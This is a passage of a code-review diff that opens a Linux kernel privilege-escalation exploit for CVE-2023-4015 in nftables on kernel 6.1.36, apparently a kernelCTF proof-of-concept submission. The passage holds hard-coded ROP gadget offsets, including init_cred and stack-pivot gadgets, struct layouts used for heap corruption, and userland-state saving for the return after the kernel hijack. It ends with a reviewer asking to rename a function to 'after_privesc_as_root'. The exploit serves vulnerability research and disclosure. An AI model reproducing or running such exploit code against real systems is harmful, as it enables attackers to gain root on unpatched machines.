pocs/linux/kernelctf/CVE-2023-4015_lts_2/exploit/lts-6.1.36/exploit.c

```diff
@@ -0,0 +1,654 @@
+#define INIT_CRED 0x2676800
+
+#define PUSH_RSI_JMP_QWORD_PTR_RSI_F 0xd8dac5 // push rsi ; jmp qword ptr [rsi + 0xf]
+#define POP_RSP_R13_R14_R15_RET 0x8888d // pop rsp ; pop r13 ; pop r14 ; pop r15 ; jmp 0xffffffff82404b80 -> ret
+#define POP_RDI_RET 0x88893 // pop rdi ; jmp 0xffffffff82404b80 -> ret
+#define POP_RSI_RET 0xd88a3 // pop rsi ; jmp 0xffffffff82404b80 -> ret
+#define POP_RDX_RET 0x47e72 // pop rdx ; jmp 0xffffffff82404b80 -> ret
+#define MOV_RDI_RAX_CMP_RDI_RDX_JNE_XOR_EAX_EAX_RET 0x10bc35e // mov rdi, rax ; cmp rdi, rdx ; jne 0xffffffff820bc355 ; xor eax, eax ; jmp 0xffffffff82404b80 -> ret
+
+struct list_head {
+    struct list_head *next, *prev;
+};
+
+struct rhash_head {
+	struct rhash_head 	*next;
+};
+
+struct rhlist_head {
+	struct rhash_head		rhead;
+	struct rhlist_head 	*next;
+};
+
+struct msg_msgseg {
+    struct msg_msgseg *next;
+};
+
+struct nft_expr {
+	struct nft_expr_ops	*ops;
+	unsigned char			data[]
+		__attribute__((aligned(__alignof__(uint64_t))));
+};
+
+struct nft_rule {
+	struct list_head		list;
+	uint64_t				handle:42,
+					genmask:2,
+					dlen:12,
+					udata:1;
+	unsigned char			data[]
+		__attribute__((aligned(__alignof__(struct nft_expr))));
+};
+
+struct nft_rule_dp {
+	uint64_t				is_last:1,
+					dlen:12,
+					handle:42;	/* for tracing */
+	unsigned char			data[]
+		__attribute__((aligned(__alignof__(struct nft_expr))));
+};
+
+struct nft_rule_blob {
+	unsigned long			size;
+	unsigned char			data[]
+		__attribute__((aligned(__alignof__(struct nft_rule_dp))));
+};
+
+struct nft_chain {
+	struct nft_rule_blob		*blob_gen_0;
+	struct nft_rule_blob		*blob_gen_1;
+	struct list_head		rules;
+	struct list_head		list;
+	struct rhlist_head		rhlhead;
+	struct nft_table		*table;
+	uint64_t				handle;
+	uint32_t				use;
+	uint8_t				flags:5,
+					bound:1,
+					genmask:2;
+	char				*name;
+	uint16_t				udlen;
+	uint8_t				*udata;
+
+	/* Only used during control plane commit phase: */
+	struct nft_rule_blob		*blob_next;
+};
+
+struct nft_userdata {
+	uint8_t			len;
+	unsigned char		data[];
+};
+
+typedef struct mnl_socket *sock;
+typedef struct mnl_nlmsg_batch *batch;
+typedef struct nlmsghdr *nlmsghdr;
+typedef struct nftnl_table *table;
+typedef struct nftnl_chain *chain;
+typedef struct nftnl_rule *rule;
+typedef struct nftnl_expr *expr;
+
+static sock nlsock;
+static const uint16_t family = NFPROTO_IPV4;
+static uint32_t seq = 1, rseq = 1, table_counter;
+static char current_table_name[16], free_chain_name[160]; // to make the freed chain name fall in kmalloc-cg-192
+static uint64_t heap, vmlinux, rule_handle;
+static uint64_t user_cs, user_ss, user_rflags, user_sp;
+
+static void save_state() {
+    __asm__(
+        ".intel_syntax noprefix;"
+        "mov user_cs, cs;"
+        "mov user_ss, ss;"
+        "mov user_sp, rsp;"
+        "pushf;"
+        "pop user_rflags;"
+        ".att_syntax;"
+    );
+}
+
+void monke() {
```

Comment:
Can you please rename this function to something else (e.g. after_privesc_as_root) and avoid the word monke in the exploit?